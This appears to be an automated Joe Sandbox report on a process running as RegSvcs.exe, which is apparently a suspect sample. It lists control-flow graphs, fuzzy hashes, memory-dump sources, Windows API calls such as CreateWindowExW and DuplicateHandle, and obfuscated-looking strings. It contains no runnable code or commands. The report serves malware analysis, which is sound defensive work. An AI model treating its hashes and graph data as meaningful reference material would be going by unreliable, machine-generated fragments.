                                                              control_flow_graph 1790 161ef88-161efb7 1791 161efb9 1790->1791 1792 161efbe-161f054 call 1617f68 1790->1792 1791->1792 1795 161f0f3-161f0f9 1792->1795 1796 161f059-161f06c 1795->1796 1797 161f0ff-161f117 1795->1797 1800 161f073-161f0c4 1796->1800 1801 161f06e 1796->1801 1798 161f119-161f126 1797->1798 1799 161f12b-161f13e 1797->1799 1802 161f4c1-161f5be 1798->1802 1803 161f140 1799->1803 1804 161f145-161f161 1799->1804 1818 161f0d7-161f0e9 1800->1818 1819 161f0c6-161f0d4 1800->1819 1801->1800 1809 161f5c0-161f5c5 call 1617f68 1802->1809 1810 161f5c6-161f5d0 1802->1810 1803->1804 1806 161f163 1804->1806 1807 161f168-161f18c 1804->1807 1806->1807 1814 161f193-161f1c5 1807->1814 1815 161f18e 1807->1815 1809->1810 1824 161f1c7 1814->1824 1825 161f1cc-161f20e 1814->1825 1815->1814 1821 161f0f0 1818->1821 1822 161f0eb 1818->1822 1819->1797 1821->1795 1822->1821 1824->1825 1827 161f210 1825->1827 1828 161f215-161f21e 1825->1828 1827->1828 1829 161f446-161f44c 1828->1829 1830 161f223-161f248 1829->1830 1831 161f452-161f465 1829->1831 1832 161f24a 1830->1832 1833 161f24f-161f286 1830->1833 1834 161f467 1831->1834 1835 161f46c-161f487 1831->1835 1832->1833 1843 161f288 1833->1843 1844 161f28d-161f2bf 1833->1844 1834->1835 1836 161f489 1835->1836 1837 161f48e-161f4a2 1835->1837 1836->1837 1841 161f4a4 1837->1841 1842 161f4a9-161f4bf LdrInitializeThunk 1837->1842 1841->1842 1842->1802 1843->1844 1846 161f2c1-161f2e6 1844->1846 1847 161f323-161f336 1844->1847 1848 161f2e8 1846->1848 1849 161f2ed-161f31b 1846->1849 1850 161f338 1847->1850 1851 161f33d-161f362 1847->1851 1848->1849 1849->1847 1850->1851 1854 161f371-161f3a9 1851->1854 1855 161f364-161f365 1851->1855 1856 161f3b0-161f411 call 161ed68 1854->1856 1857 161f3ab 1854->1857 1855->1831 1863 161f413 1856->1863 1864 161f418-161f43c 1856->1864 1857->1856 1863->1864 1867 161f443 1864->1867 1868 161f43e 1864->1868 1867->1829 1868->1867
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 224ad25f3e4aa48fc349488bd8b7acedfc4b06e1c15d807fb298d2411f561bd8
                                                              • Instruction ID: b1f4d9e6070faea6091d65113a8c1640d84728f73f6bae37c39e6ff39775f38a
                                                              • Opcode Fuzzy Hash: 224ad25f3e4aa48fc349488bd8b7acedfc4b06e1c15d807fb298d2411f561bd8
                                                              • Instruction Fuzzy Hash: 76F1F474E01218CFDB14DFA9D884B9DBBB2BF88304F54C1A9E808AB359DB749985CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aa629cbe8b3315b3867bfc6780aeb5b243c1a7346679b45f781255209edd485e
                                                              • Instruction ID: 50b3c24558ca5fd195bfeabd2941c4e3fe4dc61c90fecaa4bff88bd5386407de
                                                              • Opcode Fuzzy Hash: aa629cbe8b3315b3867bfc6780aeb5b243c1a7346679b45f781255209edd485e
                                                              • Instruction Fuzzy Hash: DBC1BF74E01218CFDB14DFA5D984B9DBBB6FB88300F2085A9D809AB354DB359E85CF11
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 337672001beb1c53943e26d69608f7b1225482ed27a82ee319f77339e13a2ff3
                                                              • Instruction ID: 187ff9ca9b0f5c0945afbdadefa280b9d32b01b22a211a7d49668e52e3d28a5d
                                                              • Opcode Fuzzy Hash: 337672001beb1c53943e26d69608f7b1225482ed27a82ee319f77339e13a2ff3
                                                              • Instruction Fuzzy Hash: F391A071E00219CBCF29DFB9CD546AEBAF2BF84310F188569D805A7399DB359D06CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cdf7edf66ec8229131a5f93cc3eb624fcdb8037977c2e19e8af40d4ade78b232
                                                              • Instruction ID: aeb8b22da5e7690fb4d5a5af207d882993ff91d809c75efdf04ddc68c62df98c
                                                              • Opcode Fuzzy Hash: cdf7edf66ec8229131a5f93cc3eb624fcdb8037977c2e19e8af40d4ade78b232
                                                              • Instruction Fuzzy Hash: 6CA13570D012088FEB14DFA8C984B9DBBB1FF89314F249269E408AB3A5DB709985CF55
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 59e9fed890e7e76b0ee3085d28df7d3a9b1839f502eaa7bf698ce2cf0f9b89f8
                                                              • Instruction ID: 7789d6ae7e5cec6d455b342077ac5d70e31cefb883cbc4f14bb24e63ad001c94
                                                              • Opcode Fuzzy Hash: 59e9fed890e7e76b0ee3085d28df7d3a9b1839f502eaa7bf698ce2cf0f9b89f8
                                                              • Instruction Fuzzy Hash: 5FA11370D012088FEB14DFA8C984B9DBBB1FF88314F249269E508AB3A5DB709985CF55
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cbac078efe35fba905aea6c0d2c2289a67fe0270ec650ff9cc919f314818cbd9
                                                              • Instruction ID: e3a277c9552a9130f70de15c685a682de7a531579c08a3c42b0a1ca47da8af3e
                                                              • Opcode Fuzzy Hash: cbac078efe35fba905aea6c0d2c2289a67fe0270ec650ff9cc919f314818cbd9
                                                              • Instruction Fuzzy Hash: 00A19074E012288FEB28CF6AD944B9DFBF2BB89300F14D1AAD509A7255DB345A85CF11
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2bb4337cc29412e526cb8fe5d722ed7553216a5f4c73b41c3b7d79dd3d23a9c
                                                              • Instruction ID: d347eb462c1a71908fd203d468e20acb510f70440528833ce23cd67fc1303e24
                                                              • Opcode Fuzzy Hash: d2bb4337cc29412e526cb8fe5d722ed7553216a5f4c73b41c3b7d79dd3d23a9c
                                                              • Instruction Fuzzy Hash: FCA19070E012288FEB28CF6AD944B9DFBF2BF89300F14D1AAD509A7255DB345A85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 59bd5db037f2977271363dd90a4a8cd2cc6811bfccf74e8f3e2dc66a983f633d
                                                              • Instruction ID: 841e97b0a5872c91fcd45d2f52ba2c03ab364f42a023745e996ec12a78cb94c3
                                                              • Opcode Fuzzy Hash: 59bd5db037f2977271363dd90a4a8cd2cc6811bfccf74e8f3e2dc66a983f633d
                                                              • Instruction Fuzzy Hash: BF810670E012088BDB14DFAAE9506ADBBF2FF88310F24D5A9E514BB354DB34A946CF54
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df85f9044be0a7a806353bf03609aef4af58d4528dc6991d317d25e05b0a4bc3
                                                              • Instruction ID: a2b515572fb026a154ff82d69f3f04f7f3368d85357acb523d4e9da6289935e0
                                                              • Opcode Fuzzy Hash: df85f9044be0a7a806353bf03609aef4af58d4528dc6991d317d25e05b0a4bc3
                                                              • Instruction Fuzzy Hash: 83910270D01218CFEB10DFA8C884BACBBB5FF49314F249269E509AB3A5DB709985CF55
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2eca51451958cb5988789d0a1e0ea1aa34d30f6ed33944c063ae28b035e09614
                                                              • Instruction ID: 43fcc3650ba7f6fabb1573f80d88050b828a1b8c994e54bef3318ce3c66c33db
                                                              • Opcode Fuzzy Hash: 2eca51451958cb5988789d0a1e0ea1aa34d30f6ed33944c063ae28b035e09614
                                                              • Instruction Fuzzy Hash: DE810670E016088BDB18DFAAD9506ADBBF2FF88300F24D5A9E514BB354DB346946CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf5ebfceb06030625eb03631a63d78ac4b9dc3c4908d7b5eff0d10eea792672d
                                                              • Instruction ID: ed4ea98b2e574a0e0d0999ef8784e2493c87529e0dfc28aeff51dab9c6cd98b8
                                                              • Opcode Fuzzy Hash: bf5ebfceb06030625eb03631a63d78ac4b9dc3c4908d7b5eff0d10eea792672d
                                                              • Instruction Fuzzy Hash: 43717271E016188FEB68CF6AC944B9DFBF2AF89300F14C4AAD50DA7254DB345A85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 46b4d3a418f8147a3accfaeafc412c4ba9689ac5bd83290623b0065f79e4c2b0
                                                              • Instruction ID: 5c5cb2ed73e155a7126a2b4a403ff1326cdfc24a618a701a7d402125d40ab949
                                                              • Opcode Fuzzy Hash: 46b4d3a418f8147a3accfaeafc412c4ba9689ac5bd83290623b0065f79e4c2b0
                                                              • Instruction Fuzzy Hash: 0A4168B1E016188BEB58CF6BCD457CAFAF3AFC8300F14C1AAD50CA6265DB740A858F51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01cfcf92b915ae3c6dd53e1be1e28b4e44cabbbe604220697cc0cace9b4c5949
                                                              • Instruction ID: 9fb4a5d0c4457cd0aebcb74e8bdc1cad36421fd801fdc9661bbd3a4b638728f7
                                                              • Opcode Fuzzy Hash: 01cfcf92b915ae3c6dd53e1be1e28b4e44cabbbe604220697cc0cace9b4c5949
                                                              • Instruction Fuzzy Hash: ED41E174E01248CBDB18CFAAD94469EBBB6EF89300F24D129D419AB368DB345946CF51

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1869 6e343e8-6e343f7 1870 6e34423-6e34427 1869->1870 1871 6e343f9-6e34406 call 6e33380 1869->1871 1872 6e3443b-6e3447c 1870->1872 1873 6e34429-6e34433 1870->1873 1878 6e34408 1871->1878 1879 6e3441c 1871->1879 1880 6e34489-6e34497 1872->1880 1881 6e3447e-6e34486 1872->1881 1873->1872 1923 6e3440e call 6e34680 1878->1923 1924 6e3440e call 6e34670 1878->1924 1879->1870 1882 6e344bb-6e344bd 1880->1882 1883 6e34499-6e3449e 1880->1883 1881->1880 1885 6e344c0-6e344c7 1882->1885 1886 6e344a0-6e344a7 call 6e3338c 1883->1886 1887 6e344a9 1883->1887 1884 6e34414-6e34416 1884->1879 1888 6e34558-6e34618 1884->1888 1889 6e344d4-6e344db 1885->1889 1890 6e344c9-6e344d1 1885->1890 1892 6e344ab-6e344b9 1886->1892 1887->1892 1918 6e34620-6e3464b GetModuleHandleW 1888->1918 1919 6e3461a-6e3461d 1888->1919 1893 6e344e8-6e344f1 1889->1893 1894 6e344dd-6e344e5 1889->1894 1890->1889 1892->1885 1899 6e344f3-6e344fb 1893->1899 1900 6e344fe-6e34503 1893->1900 1894->1893 1899->1900 1901 6e34521-6e34525 1900->1901 1902 6e34505-6e3450c 1900->1902 1925 6e34528 call 6e34940 1901->1925 1926 6e34528 call 6e34930 1901->1926 1902->1901 1904 6e3450e-6e3451e call 6e312d4 call 6e3339c 1902->1904 1904->1901 1905 6e3452b-6e3452e 1908 6e34551-6e34557 1905->1908 1909 6e34530-6e3454e 1905->1909 1909->1908 1920 6e34654-6e34668 1918->1920 1921 6e3464d-6e34653 1918->1921 1919->1918 1921->1920 1923->1884 1924->1884 1925->1905 1926->1905
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 8f8b47ae74243aca9be33ffea3a577d5bf1e5f990cc2506e0c6ded238b5a86a9
                                                              • Instruction ID: 5faa6bbed66cfe1de0f865a8caf74bbcab7a55589e44bbc5bef3d64269eada33
                                                              • Opcode Fuzzy Hash: 8f8b47ae74243aca9be33ffea3a577d5bf1e5f990cc2506e0c6ded238b5a86a9
                                                              • Instruction Fuzzy Hash: FA712470A00B55CFD7A4DF69D44879ABBF1BF88304F008A2DD49AD7A50DB34E84ACB91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1927 6e369c4-6e36a36 1929 6e36a41-6e36a48 1927->1929 1930 6e36a38-6e36a3e 1927->1930 1931 6e36a53-6e36a8b 1929->1931 1932 6e36a4a-6e36a50 1929->1932 1930->1929 1933 6e36a93-6e36af2 CreateWindowExW 1931->1933 1932->1931 1934 6e36af4-6e36afa 1933->1934 1935 6e36afb-6e36b33 1933->1935 1934->1935 1939 6e36b40 1935->1939 1940 6e36b35-6e36b38 1935->1940 1941 6e36b41 1939->1941 1940->1939 1941->1941
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06E36AE2
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 51db759ab2995135124874a4c83b7250d9f50e6380f284bbfb0b61a50bebbd5c
                                                              • Instruction ID: 4bb5d7040dc01dcd95aba6d7995c24f60476032b53936b75273729608d921517
                                                              • Opcode Fuzzy Hash: 51db759ab2995135124874a4c83b7250d9f50e6380f284bbfb0b61a50bebbd5c
                                                              • Instruction Fuzzy Hash: 5551B0B1D00359AFDB14CFA9C984ADEBFF5BF48314F24812AE818AB215D7749885CF91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1942 6e34acc-6e36a36 1944 6e36a41-6e36a48 1942->1944 1945 6e36a38-6e36a3e 1942->1945 1946 6e36a53-6e36af2 CreateWindowExW 1944->1946 1947 6e36a4a-6e36a50 1944->1947 1945->1944 1949 6e36af4-6e36afa 1946->1949 1950 6e36afb-6e36b33 1946->1950 1947->1946 1949->1950 1954 6e36b40 1950->1954 1955 6e36b35-6e36b38 1950->1955 1956 6e36b41 1954->1956 1955->1954 1956->1956
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06E36AE2
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 8d15e276d38633e17192dd00a42843df2db661d12bd8ecc0bb9ca26db150d32f
                                                              • Instruction ID: 75ebef038231b111011bbb406c91895286d0e4d1607c87435d50fc39b57074a3
                                                              • Opcode Fuzzy Hash: 8d15e276d38633e17192dd00a42843df2db661d12bd8ecc0bb9ca26db150d32f
                                                              • Instruction Fuzzy Hash: 5F51BEB1D00359AFDB14CFA9C884ADEBFF5BF48314F24812AE819AB210D775A845CF91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1957 6e34c1c-6e38fcc 1961 6e38fd2-6e38fd7 1957->1961 1962 6e3907c-6e3909c call 6e34af4 1957->1962 1964 6e3902a-6e39062 CallWindowProcW 1961->1964 1965 6e38fd9-6e39010 1961->1965 1969 6e3909f-6e390ac 1962->1969 1967 6e39064-6e3906a 1964->1967 1968 6e3906b-6e3907a 1964->1968 1971 6e39012-6e39018 1965->1971 1972 6e39019-6e39028 1965->1972 1967->1968 1968->1969 1971->1972 1972->1969
                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 06E39051
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: e8c515edfe19bfc659eabb8f05dc27e363ccd8c695704e8e4ffa477218c9ad1c
                                                              • Instruction ID: af6301402e14360fa38d5b88f57c4b11d2ff4eb08acfd24cb454f3e561a3b768
                                                              • Opcode Fuzzy Hash: e8c515edfe19bfc659eabb8f05dc27e363ccd8c695704e8e4ffa477218c9ad1c
                                                              • Instruction Fuzzy Hash: D94127B4900315CFDB54CF99C888AAABBF5FB88324F24C459D519AB321E775A841CFA0
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05BFB8A6,?,?,?,?,?), ref: 05BFB967
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 273faedb1935576969522fa5cfcdbbe9b970ed1aaddf910aaeae09c9af31cb92
                                                              • Instruction ID: 0e8ecd1fb78a5e76957771bb3563114e60c6e17c9367fc86c8f636f5e170757f
                                                              • Opcode Fuzzy Hash: 273faedb1935576969522fa5cfcdbbe9b970ed1aaddf910aaeae09c9af31cb92
                                                              • Instruction Fuzzy Hash: 5521E5B5900248DFDB10CF9AD584ADEBBF5FB48320F14846AE954A7310D374A944CFA5
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05BFB8A6,?,?,?,?,?), ref: 05BFB967
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 865c97900a3ab709a0f850039b812ac15e89a395e47a6630feada9094b8a2d9e
                                                              • Instruction ID: 0004af333ff19bf354b95db23b7f04c1522d13e18c000a3da6c1384485a20657
                                                              • Opcode Fuzzy Hash: 865c97900a3ab709a0f850039b812ac15e89a395e47a6630feada9094b8a2d9e
                                                              • Instruction Fuzzy Hash: 8F21E3B5900258DFDB10CFAAD984ADEBFF9FB48320F14805AE954A7250D378A944CFA5
                                                              APIs
                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 0161F4AE
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 89b710acca92e4ed238fad8d50b12a0790d9563b27af47ff583318e783f1ded3
                                                              • Instruction ID: 9dcdc19dcb10050758ba7bb1a9c046d659c44d6474a9f31a3188e29fbe505309
                                                              • Opcode Fuzzy Hash: 89b710acca92e4ed238fad8d50b12a0790d9563b27af47ff583318e783f1ded3
                                                              • Instruction Fuzzy Hash: 26117274E011099FDB04DFA8D884AADBBB5FB88314F18D165F904E724ADB30A945CB64
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,06E34404), ref: 06E3463E
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 6907be3ef6d6406c37572c6d1f3ceeb4f0358b3b9242b513d236997b5177ad66
                                                              • Instruction ID: 3174d79d0a366ba5f8dd9214a237f206af3e43cb12cece5347e2067e462a93ab
                                                              • Opcode Fuzzy Hash: 6907be3ef6d6406c37572c6d1f3ceeb4f0358b3b9242b513d236997b5177ad66
                                                              • Instruction Fuzzy Hash: DA113FB5C00758CFCB10CF9AD448ADEFBF4EB88324F10806AD829A7250C378A944CFA1
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 06E3B52D
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID:
                                                              • API String ID: 2538663250-0
                                                              • Opcode ID: 702e6cd184edbe2b8289018e6a5ce629247c64b706881234aef3cee4f31aac7a
                                                              • Instruction ID: 286b5998fca0bfac934dfa387a9e8559be67f2be36d10653364a67e285b7c3a9
                                                              • Opcode Fuzzy Hash: 702e6cd184edbe2b8289018e6a5ce629247c64b706881234aef3cee4f31aac7a
                                                              • Instruction Fuzzy Hash: F91115B59003588FCB60DF9AD449BDEFBF4EB58324F108469D519A7210D378AA44CFA5
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 06E3B52D
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID:
                                                              • API String ID: 2538663250-0
                                                              • Opcode ID: e05459ee1ea09466265385192b80d06e862d7bd9cbf3b308957aec6d11b9efd5
                                                              • Instruction ID: 3d98f42427fcfc2fbe065ac56b7fe1fbc7a6a3db1fe79110ceb7a46fa337126d
                                                              • Opcode Fuzzy Hash: e05459ee1ea09466265385192b80d06e862d7bd9cbf3b308957aec6d11b9efd5
                                                              • Instruction Fuzzy Hash: F51133B58003488FCB20DF99D488BDEBFF4EB48324F208459D558A7210D379A540CFA5
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2950369967.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_12bd000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 939e6f8d5cc26a9451d285a24f5fbf3b15eea0c03b1a5fbda81144bd6ac4b731
                                                              • Instruction ID: 5332df3c7dcdaa1d2690927635f5cfd1849c05043c2bd4e81b95e48eb6b547b1
                                                              • Opcode Fuzzy Hash: 939e6f8d5cc26a9451d285a24f5fbf3b15eea0c03b1a5fbda81144bd6ac4b731
                                                              • Instruction Fuzzy Hash: 16216470524208DFCB11DF58C9C0BA6BBA1FB84398F20C96DD9094B252C37BD447CB62
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2950369967.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_12bd000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                              • Instruction ID: 571cbc4fc4c557d303ba1c24d1ece472ce483321ba6f41814b826d9e7fbba3fb
                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                              • Instruction Fuzzy Hash: 5311EB75504284CFCB12CF58C5C0B95BFA1FB84318F28CAAADD094B252C33AD40ACB62
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$0oAp$LjAp$LjAp$LjAp$LjAp$LjAp$LjAp$LjAp$LjAp$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
                                                              • API String ID: 0-2009027844
                                                              • Opcode ID: ebe86110b6e9927045728399a8230a13f5b8a65d2d3d1b9e4605ce8333f3cdb3
                                                              • Instruction ID: 8a1a9816179186b3c3c33a1f2c6f86c6a6a164ab2423a4c0929adf224e3fb5fc
                                                              • Opcode Fuzzy Hash: ebe86110b6e9927045728399a8230a13f5b8a65d2d3d1b9e4605ce8333f3cdb3
                                                              • Instruction Fuzzy Hash: DC327E74E002188FDB64CF69C994B9DBBB2FB49300F1084E9D919AB364DB75AE85CF10
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$0oAp$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
                                                              • API String ID: 0-2641638890
                                                              • Opcode ID: 146eb736aff82789bbcf8fc633e7b9e629488f14245bb5ffd153b9b54926de8e
